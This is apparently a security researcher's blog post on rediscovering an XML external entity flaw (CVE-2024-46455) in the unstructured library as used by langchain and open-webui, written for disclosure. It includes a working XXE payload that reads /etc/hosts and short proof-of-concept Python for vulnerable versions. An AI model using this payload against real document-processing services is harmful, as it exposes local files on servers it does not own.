Before proceeding I would like to give a shoutout to my awesome friend and colleagueMohit Kwho tagged along in this journey and played a pivotal role.

Summary

This blog is a result of the applied vulnerability research that we did against open-webui [ For those who don’t know, WebUI provides the UI for Ollama AI models ]

open-webui has a feature to upload files and then ask models to answer from the uploaded content. This is where our internal security team found this vulnerability, on first look we thought this is related to the open-webui project. This specific vulnerability caught my interest and on digging further we realized that we are looking at a new CVE !!!

Exploitation Steps

We have uploaded a malicious xml payload to the open-webui chat window and upon asking questions from the uploaded document, we saw that it displayed the contents of a local file. I was thinking this could be due to the LLM model hallucinating and producing garbage response.

To confirm this, I looked into the source code of open-webui for the code responsible for processing the uploaded document

process_doc function internally called the get_loader function to find the appropriate loader to process the document based on the content-type of the document.

[ removed the lines in between these snippets to save your eyes ]

A bump on our journey

UnstructuredXMLLoader comes from the langchain library which contains few other loaders

Now you may wonder, what these loaders are ? They are nothing but classes that has functions to parse the documents and load the contents of the document, so that our LLMs can interpret the context and answer our questions from them.

They named it this way so it is similar to Java’s Interfaces and their implementations

When we thought our journey has hit a wall and we are not sure what to do, we checked if there are any known vulnerabilities against this library. To our surprise there was one, but it was not against the function we are looking at

Then we further looked into this vulnerability and after few hours we go to know that this vulnerability is not there in latest version of langchain and this gave an idea to test this vulnerability by decreasing the versions of langchain library.

Finding the vulnerable version

Following image reveals that langchain==0.2.14 was found to be secure against this vulnerability,

but langchain==0.2.0 which uses unstructured==0.14.2 was found to be vulnerable !

# vulnerable on unstructured <= 0.14.2
from langchain_community.document_loaders import UnstructuredXMLLoader

loader = UnstructuredXMLLoader("/path/to/xxe/payload.xml")
data = loader.load()
print(data)

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/hosts"> ]>
<userInfo>
 <username>&ent;</username>
</userInfo>

If you are into applied vulnerability research, you know what this means ! Now we know the vulnerable version, we have to look at the Changelog to see what changes are introduced

I’m sure that caught your eyes too !! The team has fixed a vulnerability without publishing a security advisory and due this there is no record of this vulnerability in the face of internet.

And there is possibility of lot of developers still using the older version and no SCA scanners would be able to alert them. WOW !

The pull request that fixed this issue :: https://github.com/Unstructured-IO/unstructured/pull/3088/commits

Proof of Concept

# vulnerable on unstructured <= 0.14.2
from unstructured.partition.xml import partition_xml

data = partition_xml(filename="./payload.xml")
print([ x.text for x in data])

Conclusion

And with this, we have concluded that we re-discovered a vulnerability which was fixed without notifying the users of the package. In general, this is not considered as a good security practice. We have to let the users know about the vulnerability even it is fixed on the very next release, this will help them to plan the updates and avoid unnecessary breaches due to usage of outdated versions of this library.

I am attaching the canvas I used during this vulnerability research, hope you find this interesting !

CVE-2024-46455 : XML eXternal Entity vulnerability in unstructured.io <= 0.14.2